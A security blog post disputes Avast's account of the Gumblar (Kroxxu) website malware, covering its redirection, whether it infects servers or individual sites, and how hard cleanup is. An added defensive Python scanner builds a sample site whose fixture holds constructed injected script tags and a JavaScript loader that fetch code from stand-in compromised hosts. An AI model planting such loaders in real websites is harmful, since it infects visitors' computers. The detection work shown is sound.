Clearing Up Recent Information about Gumblar (Kroxxu) Malware

Avast has released a new analysis of the latest variant of the Gumblar malware (which Avast refers to as Kroxxu). This analysis, and the media coverage of it, contain some misleading information about the malware.

Some of the media coverage has claimed that this variant is new or newly detected, but it has been around since October of 2009 and was detected at the time.

Avast emphasizes the malware's use of redirection, which makes it sound more nefarious and advanced than it actually is. Gumblar is far from the only malware to use redirection. Other malware uses redirection as part of its basic setup, whereas Gumblar's redirection is a by-product of how it operates. It is not an attempt to hide the malware, as Avast suggests may be the case, nor a glitch, as they also suggest is possible. Instead of hosting the code that infects users' computers on a server controlled by the person(s) behind the malware, as is the standard practice, the code is placed on some of the websites they have compromised. The websites used for this purpose are changed frequently, and when they switch, the old ones are set to redirect to the new ones. Gumblar updates the other infected websites to call the new hosting websites, but leaves the calls to the old websites in JavaScript files, and those stale calls are what produce the redirects.

Avast refers to infected servers, but the malware does not affect the server itself; it affects individual websites hosted on a server. This is an important distinction because on a shared server Gumblar would not infect other websites for which it does not have FTP credentials. Avast claims there is "difficulty in removing" it, which is not true. If a clean backup is available, the website can simply be reverted to it. If one is not available, the malware code needs to be removed from the files, which is no more difficult than for any other malware added to websites. In either case the FTP credentials the malware used to get in should be changed, since otherwise the files can simply be modified again. More sophisticated malware does infect the server itself, which makes it harder to clean.
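As an added example (not from the original post, and not code from Avast's analysis or from the malware itself), the following Python script inventories every script load from a host other than the site's own across a site's files. It is the kind of check a practitioner runs when no clean backup is available, since the injected calls described above, including the stale ones that now redirect, are references to other compromised websites rather than code on the site's own host. The script uses no Gumblar-specific signature; the file extensions scanned, the two patterns, and the constructed sample site (hostnames under .example) are all assumptions made for the example.

```python
import os
import re
import tempfile
from collections import Counter
from urllib.parse import urlparse

# File types an FTP-based website infection would typically modify (assumption).
SCAN_EXTENSIONS = {".html", ".htm", ".php", ".js"}

# <script ... src="http(s)://host/..."> in HTML/PHP, and an absolute URL assigned
# to a script element's .src inside JavaScript. Both patterns are generic and
# are not a signature for any particular malware family.
SCRIPT_TAG_RE = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)', re.IGNORECASE)
JS_SRC_RE = re.compile(
    r'\.src\s*=\s*["\'](https?://[^"\']+)["\']', re.IGNORECASE)


def find_external_script_refs(root, own_hosts):
    """Return [(relative_path, url, host)] for every script load whose host is
    not one of the site's own hosts. Relative src values are ignored."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for pattern in (SCRIPT_TAG_RE, JS_SRC_RE):
                for url in pattern.findall(text):
                    host = (urlparse(url).hostname or "").lower()
                    if host not in own:
                        hits.append((os.path.relpath(path, root), url, host))
    return hits


def hosts_by_file_count(hits):
    """Count how many distinct files reference each external host; a host
    referenced from many unrelated files is the first thing to look at."""
    seen = {(path, host) for path, _url, host in hits}
    return Counter(host for _path, host in seen)


def build_sample_site(root):
    """Write a small constructed site: legitimate assets plus two injected
    loaders. The hostnames and the injected lines are made up for this example."""
    os.makedirs(os.path.join(root, "js"), exist_ok=True)
    files = {
        "index.html": (
            "<html><head>\n"
            '<script src="/js/app.js"></script>\n'
            '<script src="https://www.example.com/js/site.js"></script>\n'
            # constructed injected tag calling another compromised site
            '<script src="http://compromised-a.example/images/x.php"></script>\n'
            "</head><body>Hello</body></html>\n"),
        "about.html": (
            '<html><head><script src="/js/app.js"></script></head>\n'
            '<body><script src="http://compromised-a.example/images/x.php">'
            "</script></body></html>\n"),
        "js/app.js": (
            "function init() { console.log('app'); }\n"
            # constructed appended loader still calling an old host
            "var s=document.createElement('script');"
            "s.src='http://compromised-b.example/stale.php';"
            "document.body.appendChild(s);\n"),
        "js/clean.js": "function noop() {}\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)


def run_demo():
    """Build the constructed site in a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix="site-scan-")
    build_sample_site(root)
    hits = find_external_script_refs(root, ["www.example.com"])
    return hits, hosts_by_file_count(hits)


if __name__ == "__main__":
    found, counts = run_demo()
    for path, url, host in found:
        print(f"{path}: {url}")
    print("external hosts by number of files:", dict(counts))
```

Anything the script reports still needs a human decision: a legitimate third-party script (analytics, a CDN) will show up alongside injected loaders, so the value is in the list of hosts and how many files carry each, not in an automatic verdict. After removing an injected call, re-run the scan to confirm that no file still references the old host.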

Avast also emphasizes that the infections have remained on websites for long periods of time, which is true, but this is not out of the ordinary for website malware.

While it is difficult to measure the size of website malware infections, neither the size Avast currently claims nor the historical size of this infection is above the level of many of the larger website malware infections.